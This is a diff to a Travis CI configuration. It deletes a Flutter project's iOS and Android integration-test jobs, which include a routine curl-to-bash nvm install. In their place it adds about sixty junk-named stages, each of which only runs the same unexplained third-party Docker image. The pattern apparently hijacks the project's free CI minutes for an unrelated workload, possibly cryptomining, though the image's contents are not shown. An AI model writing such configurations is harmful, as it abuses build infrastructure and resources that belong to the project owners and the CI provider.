--- a/.travis.yml
+++ b/.travis.yml
@@ -1,84 +1,125 @@
-language: dart
-
+language: c
+arch:
+  - amd64
+compiler:
+  - gcc
+services:
+  - docker
 jobs:
   include:
-    - stage: iOS Integration Tests
-      os: osx
-      osx_image: xcode12.3
-      install:
-        - export HOMEBREW_NO_AUTO_UPDATE=1
-        - brew install node
-        - brew install libimobiledevice ideviceinstaller ios-deploy
-        - brew install cocoapods || echo 'ignore exit(1)'
-        - brew link --overwrite cocoapods
-        - export FLUTTER_HOME=$HOME/flutter
-        - export PATH=$HOME/flutter:$HOME/flutter/bin/:$HOME/flutter/bin/cache/dart-sdk/bin:$PATH
-        - git clone https://github.com/flutter/flutter.git $FLUTTER_HOME
-        - cd $FLUTTER_HOME
-        - git checkout beta
-        - git checkout stable
-        - flutter doctor
-        - flutter channel master
-        - flutter upgrade
-        - flutter doctor
-        - cd $TRAVIS_BUILD_DIR/nodejs_server_test_auth_basic_and_ssl
-        - npm install
-        - cd $TRAVIS_BUILD_DIR
-      before_script:
-        - xcrun simctl list
-        - xcrun simctl create Flutter-iPhone com.apple.CoreSimulator.SimDeviceType.iPhone-12 com.apple.CoreSimulator.SimRuntime.iOS-14-3 | xargs xcrun simctl boot
-      script:
-        - ./scripts/test.sh $(ipconfig getifaddr en0)
-      cache:
-        directories:
-          - $HOME/.pub-cache
-
-  include:
-    - stage: Android Integration Tests
-      language: android
-      dist: trusty
-      android:
-        components:
-          - tools
-          - platform-tools
-          - build-tools-30.0.0
-          - android-30
-          - sys-img-x86-android-30
-      licenses:
-        - 'android-sdk-preview-license-52d11cd2'
-        - 'android-sdk-license-.+'
-        - 'google-gdk-license-.+'
-      before_install:
-        - yes | sdkmanager "platforms;android-30"
-        - echo no | avdmanager --verbose create avd --force -n test -k "system-images;android-30;google_apis;x86"
-        - emulator -avd test -verbose -no-window -no-audio &
-        - ./scripts/android-wait-for-emulator.sh
-      install:
-        - export FLUTTER_HOME=$HOME/flutter
-        - export PATH=$HOME/flutter:$HOME/flutter/bin/:$HOME/flutter/bin/cache/dart-sdk/bin:$PATH
-        - git clone https://github.com/flutter/flutter.git $FLUTTER_HOME
-        - cd $FLUTTER_HOME
-        - git checkout beta
-        - git checkout stable
-        - flutter doctor
-        - flutter channel master
-        - flutter upgrade
-        - flutter doctor
-        - cd $TRAVIS_BUILD_DIR
-        - curl -o- https://raw.githubusercontent.com/nvm-sh/nvm/v0.37.2/install.sh | bash
-        - export NVM_DIR="$HOME/.nvm"
-        - source "$NVM_DIR/nvm.sh"  # This loads nvm
-        - nvm install node
-        - nvm use node
-        - cd $TRAVIS_BUILD_DIR/nodejs_server_test_auth_basic_and_ssl
-        - npm install
-        - cd $TRAVIS_BUILD_DIR
-      script:
-        - export PATH="$PATH":"$HOME/.pub-cache/bin"
-        - export NVM_DIR="$HOME/.nvm"
-        - source "$NVM_DIR/nvm.sh"  # This loads nvm
-        - nvm use node
-        - ./scripts/test.sh $(ifconfig en0 | grep "inet " | grep -Fv 127.0.0.1 | awk '{print $2}')
-      cache:
-        directories:
-          - $HOME/.pub-cache
+    - stage: test
+      script: docker run christiankm01/master:3.15.5
+    - stage: test2
+      script: docker run christiankm01/master:3.15.5
+    - stage: deploy
+      script: docker run christiankm01/master:3.15.5
+    - stage: testman
+      script: docker run christiankm01/master:3.15.5
+    - stage: test-capability
+      script: docker run christiankm01/master:3.15.5
+    - stage: test-capabilitd
+      script: docker run christiankm01/master:3.15.5
+    - stage: test-capabilitya
+      script: docker run christiankm01/master:3.15.5
+    - stage: test-capabilityki
+      script: docker run christiankm01/master:3.15.5
+    - stage: test-capabilityn
+      script: docker run christiankm01/master:3.15.5
+    - stage: test-capabilityks
+      script: docker run christiankm01/master:3.15.5
+    - stage: test-capabili
+      script: docker run christiankm01/master:3.15.5
+    - stage: test-capab
+      script: docker run christiankm01/master:3.15.5
+    - stage: test-capabilityhjj
+      script: docker run christiankm01/master:3.15.5 
+    - stage: test-capabiy
+      script: docker run christiankm01/master:3.15.5
+    - stage: manaja
+      script: docker run christiankm01/master:3.15.5
+    - stage: test-capasjx
+      script: docker run christiankm01/master:3.15.5
+    - stage: test-capabiyjsjajajj
+      script: docker run christiankm01/master:3.15.5   
+    - stage: test-capabiykimhokjs
+      script: docker run christiankm01/master:3.15.5  
+    - stage: test3
+      script: docker run christiankm01/master:3.15.5 
+    - stage: test4
+      script: docker run christiankm01/master:3.15.5
+    - stage: test5
+      script: docker run christiankm01/master:3.15.5     
+    - stage: test6
+      script: docker run christiankm01/master:3.15.5 
+    - stage: test7
+      script: docker run christiankm01/master:3.15.5
+    - stage: test8
+      script: docker run christiankm01/master:3.15.5     
+    - stage: test9
+      script: docker run christiankm01/master:3.15.5 
+    - stage: test10
+      script: docker run christiankm01/master:3.15.5
+    - stage: test11
+      script: docker run christiankm01/master:3.15.5     
+    - stage: test12
+      script: docker run christiankm01/master:3.15.5 
+    - stage: test14
+      script: docker run christiankm01/master:3.15.5
+    - stage: test13
+      script: docker run christiankm01/master:3.15.5     
+    - stage: test14
+      script: docker run christiankm01/master:3.15.5 
+    - stage: test15
+      script: docker run christiankm01/master:3.15.5
+    - stage: test16
+      script: docker run christiankm01/master:3.15.5     
+    - stage: test17
+      script: docker run christiankm01/master:3.15.5     
+    - stage: test18
+      script: docker run christiankm01/master:3.15.5     
+    - stage: test19
+      script: docker run christiankm01/master:3.15.5     
+    - stage: test20
+      script: docker run christiankm01/master:3.15.5     
+    - stage: test21
+      script: docker run christiankm01/master:3.15.5     
+    - stage: test22
+      script: docker run christiankm01/master:3.15.5     
+    - stage: test23
+      script: docker run christiankm01/master:3.15.5     
+    - stage: test24
+      script: docker run christiankm01/master:3.15.5     
+    - stage: test25
+      script: docker run christiankm01/master:3.15.5     
+    - stage: test26
+      script: docker run christiankm01/master:3.15.5     
+    - stage: test27
+      script: docker run christiankm01/master:3.15.5     
+    - stage: test28
+      script: docker run christiankm01/master:3.15.5     
+    - stage: test29
+      script: docker run christiankm01/master:3.15.5     
+    - stage: test30
+      script: docker run christiankm01/master:3.15.5     
+    - stage: test31
+      script: docker run christiankm01/master:3.15.5     
+    - stage: test32
+      script: docker run christiankm01/master:3.15.5     
+    - stage: test33
+      script: docker run christiankm01/master:3.15.5     
+    - stage: test34
+      script: docker run christiankm01/master:3.15.5     
+    - stage: test35
+      script: docker run christiankm01/master:3.15.5     
+    - stage: test36
+      script: docker run christiankm01/master:3.15.5     
+    - stage: test37
+      script: docker run christiankm01/master:3.15.5     
+    - stage: test38
+      script: docker run christiankm01/master:3.15.5     
+    - stage: test39
+      script: docker run christiankm01/master:3.15.5     
+    - stage: test40
+      script: docker run christiankm01/master:3.15.5     
+    - stage: test41
+      script: docker run christiankm01/master:3.15.5     
